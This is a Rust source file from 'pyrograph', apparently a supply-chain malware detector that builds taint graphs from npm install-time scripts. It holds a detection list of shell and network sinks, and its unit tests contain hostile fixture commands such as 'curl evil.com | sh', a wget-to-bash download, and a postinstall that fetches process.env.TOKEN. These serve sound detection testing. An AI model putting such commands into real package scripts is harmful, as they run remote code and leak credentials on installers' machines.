pyrograph 0.1.0

GPU-accelerated taint analysis for supply chain malware detection
Documentation
use std::collections::HashMap;
use std::path::Path;

use crate::error::Result;
use crate::ir::{EdgeKind, NodeKind, TaintGraph};

/// Parsed package.json scripts section.
#[derive(Debug, Default)]
pub struct PackageScripts {
    pub scripts: HashMap<String, String>,
}

impl PackageScripts {
    pub fn from_json(json: &str) -> Result<Self> {
        let raw: serde_json::Value = serde_json::from_str(json)
            .map_err(|e| crate::error::Error::Analysis(format!("package.json parse error: {}", e)))?;
        
        let mut scripts = HashMap::new();
        if let Some(obj) = raw.get("scripts").and_then(|v| v.as_object()) {
            for (k, v) in obj {
                if let Some(s) = v.as_str() {
                    scripts.insert(k.clone(), s.to_string());
                }
            }
        }
        Ok(Self { scripts })
    }

    pub fn from_file(path: &Path) -> Result<Self> {
        let content = std::fs::read_to_string(path)
            .map_err(|e| crate::error::Error::Io(e))?;
        Self::from_json(&content)
    }
}

/// Auto-executing npm lifecycle scripts that run without user interaction.
const AUTO_EXECUTING_SCRIPTS: &[&str] = &["preinstall", "postinstall", "install"];

/// Check whether `haystack` contains `needle` as a whole word.
fn matches_word_boundary(haystack: &str, needle: &str) -> bool {
    for (i, _) in haystack.match_indices(needle) {
        let before = if i == 0 {
            true
        } else {
            !haystack.as_bytes()[i - 1].is_ascii_alphanumeric()
        };
        let after_idx = i + needle.len();
        let after = if after_idx >= haystack.len() {
            true
        } else {
            !haystack.as_bytes()[after_idx].is_ascii_alphanumeric()
        };
        if before && after {
            return true;
        }
    }
    false
}

/// Detect if a script string invokes a known shell command.
fn has_shell_command(value: &str) -> bool {
    let lower = value.to_ascii_lowercase();
    ["curl", "wget", "node", "sh", "bash"]
        .iter()
        .any(|cmd| matches_word_boundary(&lower, cmd))
}

/// Detect dangerous shell sinks in a script string.
/// Returns a list of sink identifiers (e.g., "shell:sh", "shell:bash").
fn detect_shell_sinks(value: &str) -> Vec<&'static str> {
    let lower = value.to_ascii_lowercase();
    let mut sinks = Vec::new();

    // Pipe to sh or bare sh invocation
    if lower.contains("| sh")
        || lower.contains("|sh")
        || lower.contains(";sh")
        || lower.starts_with("sh ")
        || lower.contains(" sh ")
        || lower.contains("\tsh ")
        || lower.contains("\nsh ")
    {
        sinks.push("shell:sh");
    }

    // Pipe to bash or bare bash invocation
    if lower.contains("| bash")
        || lower.contains("|bash")
        || lower.contains(";bash")
        || lower.starts_with("bash ")
        || lower.contains(" bash ")
        || lower.contains("\tbash ")
        || lower.contains("\nbash ")
    {
        sinks.push("shell:bash");
    }

    // eval
    if lower.contains("eval(")
        || lower.starts_with("eval ")
        || lower.contains(" eval ")
        || lower.contains(";eval ")
        || lower.contains("\teval ")
        || lower.contains("\neval ")
    {
        sinks.push("shell:eval");
    }

    // exec
    if lower.contains("exec(")
        || lower.starts_with("exec ")
        || lower.contains(" exec ")
        || lower.contains(";exec ")
        || lower.contains("\texec ")
        || lower.contains("\nexec ")
    {
        sinks.push("shell:exec");
    }

    sinks
}

/// Detect dangerous JS sinks in a script string (e.g., fetch, eval, child_process.exec).
fn detect_js_sinks(value: &str) -> Vec<&'static str> {
    let lower = value.to_ascii_lowercase();
    let mut sinks = Vec::new();

    if matches_word_boundary(&lower, "fetch")
        || matches_word_boundary(&lower, "xmlhttprequest")
        || matches_word_boundary(&lower, "websocket")
    {
        sinks.push("fetch");
    }

    if matches_word_boundary(&lower, "eval") {
        sinks.push("eval");
    }

    if matches_word_boundary(&lower, "function") {
        sinks.push("Function");
    }

    if lower.contains("child_process.exec") || lower.contains("child_process.execsync") {
        sinks.push("child_process.exec");
    }
    if lower.contains("child_process.spawn") || lower.contains("child_process.spawnsync") {
        sinks.push("child_process.spawn");
    }
    if lower.contains("child_process.execfile") {
        sinks.push("child_process.execFile");
    }
    if lower.contains("child_process.fork") {
        sinks.push("child_process.fork");
    }

    if lower.contains("http.request") || lower.contains("https.request") {
        sinks.push("http.request");
        sinks.push("https.request");
    }
    if lower.contains("http.get") || lower.contains("https.get") {
        sinks.push("http.get");
        sinks.push("https.get");
    }

    if lower.contains("net.connect") || lower.contains("net.createconnection") {
        sinks.push("net.connect");
    }

    if lower.contains("dns.lookup") {
        sinks.push("dns.lookup");
    }

    if matches_word_boundary(&lower, "settimeout") {
        sinks.push("setTimeout");
    }
    if matches_word_boundary(&lower, "setinterval") {
        sinks.push("setInterval");
    }
    if matches_word_boundary(&lower, "setimmediate") {
        sinks.push("setImmediate");
    }
    if lower.contains("process.nexttick") {
        sinks.push("process.nextTick");
    }

    sinks.sort();
    sinks.dedup();
    sinks
}

/// Populate an existing taint graph with nodes/edges derived from package.json scripts.
pub fn populate_package_json_graph(source: &str, graph: &mut TaintGraph) -> Result<()> {
    let scripts = PackageScripts::from_json(source)?;

    for (name, value) in &scripts.scripts {
        if !AUTO_EXECUTING_SCRIPTS.contains(&name.as_str()) {
            continue;
        }

        let shell_sinks = detect_shell_sinks(value);
        let js_sinks = detect_js_sinks(value);
        if (shell_sinks.is_empty() && js_sinks.is_empty()) || !has_shell_command(value) {
            continue;
        }

        // The script name is the source (e.g., "postinstall").
        let source_id = graph.add_node(NodeKind::Variable, name.clone(), None);

        // Create a sink node for each dangerous shell pattern detected.
        for sink_name in shell_sinks {
            let sink_id = graph.add_node(NodeKind::Call, sink_name.to_string(), None);
            graph.add_edge(source_id, sink_id, EdgeKind::Argument);
        }
        for sink_name in js_sinks {
            let sink_id = graph.add_node(NodeKind::Call, sink_name.to_string(), None);
            graph.add_edge(source_id, sink_id, EdgeKind::Argument);
        }
    }

    Ok(())
}

/// Build a taint graph from package.json scripts.
///
/// For each auto-executing script (preinstall, postinstall, install) whose
/// value contains both a shell command and a dangerous sink, taint nodes
/// are created representing the script name (source) and the dangerous
/// shell execution (sink), wired together.
pub fn parse_package_json(source: &str) -> Result<TaintGraph> {
    let mut graph = TaintGraph::new();
    populate_package_json_graph(source, &mut graph)?;
    Ok(graph)
}

/// Read package.json from `path` and build a taint graph.
pub fn parse_package_json_file(path: &Path) -> Result<TaintGraph> {
    let source = std::fs::read_to_string(path)
        .map_err(|e| crate::error::Error::Io(e))?;
    parse_package_json(&source)
}

#[cfg(test)]
mod tests {
    use super::*;

    #[test]
    fn parse_empty_package_json() {
        let graph = parse_package_json(r#"{"name":"test"}"#).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    #[test]
    fn parse_scripts_no_taint() {
        let json = r#"{"scripts":{"build":"tsc","test":"jest"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    #[test]
    fn parse_postinstall_pipe_to_sh() {
        let json = r#"{"scripts":{"postinstall":"curl evil.com | sh"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 2);

        let sources: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "postinstall")
            .collect();
        assert_eq!(sources.len(), 1);

        let sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:sh")
            .collect();
        assert_eq!(sinks.len(), 1);
    }

    #[test]
    fn parse_preinstall_bash_and_eval() {
        let json = r#"{"scripts":{"preinstall":"bash -c 'eval(node malicious.js)'"}}"#;
        let graph = parse_package_json(json).unwrap();

        // Should have source + bash sink + eval sink = 3 nodes
        assert_eq!(graph.node_count(), 3);

        let bash_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:bash")
            .collect();
        assert_eq!(bash_sinks.len(), 1);

        let eval_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:eval")
            .collect();
        assert_eq!(eval_sinks.len(), 1);
    }

    #[test]
    fn parse_install_wget_exec() {
        let json = r#"{"scripts":{"install":"wget http://evil.com/run.sh -O- | bash; exec node payload.js"}}"#;
        let graph = parse_package_json(json).unwrap();

        let bash_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:bash")
            .collect();
        assert_eq!(bash_sinks.len(), 1);

        let exec_sinks: Vec<_> = graph
            .nodes()
            .iter()
            .filter(|n| n.name == "shell:exec")
            .collect();
        assert_eq!(exec_sinks.len(), 1);
    }

    #[test]
    fn non_auto_script_ignored() {
        // Even with a dangerous pattern, non-auto-executing scripts are ignored
        let json = r#"{"scripts":{"build":"curl evil.com | sh"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    #[test]
    fn no_shell_command_no_nodes() {
        // Dangerous sink without a preceding shell command should not create nodes
        let json = r#"{"scripts":{"postinstall":"echo hello"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    #[test]
    fn adversarial_malformed_json() {
        let result = parse_package_json("not json at all");
        assert!(result.is_err(), "Malformed JSON must return an error");
    }

    #[test]
    fn adversarial_empty_scripts() {
        let graph = parse_package_json(r#"{"scripts":{}}"#).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    #[test]
    fn adversarial_missing_scripts() {
        let graph = parse_package_json(r#"{"name":"x"}"#).unwrap();
        assert_eq!(graph.node_count(), 0);
    }

    #[test]
    fn word_boundary_sh_does_not_match_bash() {
        // "bash" contains "sh" as a substring but not as a word boundary match.
        // Our detector uses the same word-boundary logic for curl/wget/node/sh/bash.
        // For shell sinks, we explicitly check bash separately.
        let json = r#"{"scripts":{"postinstall":"bash script.sh"}}"#;
        let graph = parse_package_json(json).unwrap();
        // bash is a shell command, and shell:bash should be detected
        let has_bash_sink = graph.nodes().iter().any(|n| n.name == "shell:bash");
        assert!(has_bash_sink, "bash should be detected as a sink");
    }

    #[test]
    fn parse_postinstall_node_fetch() {
        let json = r#"{"scripts":{"postinstall":"node -e 'fetch(process.env.TOKEN)'"}}"#;
        let graph = parse_package_json(json).unwrap();
        assert_eq!(graph.node_count(), 2);
        let has_postinstall = graph.nodes().iter().any(|n| n.name == "postinstall");
        let has_fetch = graph.nodes().iter().any(|n| n.name == "fetch");
        assert!(has_postinstall, "expected postinstall source node");
        assert!(has_fetch, "expected fetch sink node");
    }

    #[test]
    fn concurrent_access_stress() {
        // Spawn multiple threads parsing the same malicious package.json
        let json = r#"{"scripts":{"postinstall":"curl evil.com | sh","preinstall":"node x.js | bash"}}"#;
        let mut handles = Vec::new();
        for _ in 0..100 {
            let json = json.to_string();
            handles.push(std::thread::spawn(move || {
                let graph = parse_package_json(&json).unwrap();
                assert_eq!(graph.node_count(), 4);
            }));
        }
        for h in handles {
            h.join().unwrap();
        }
    }
}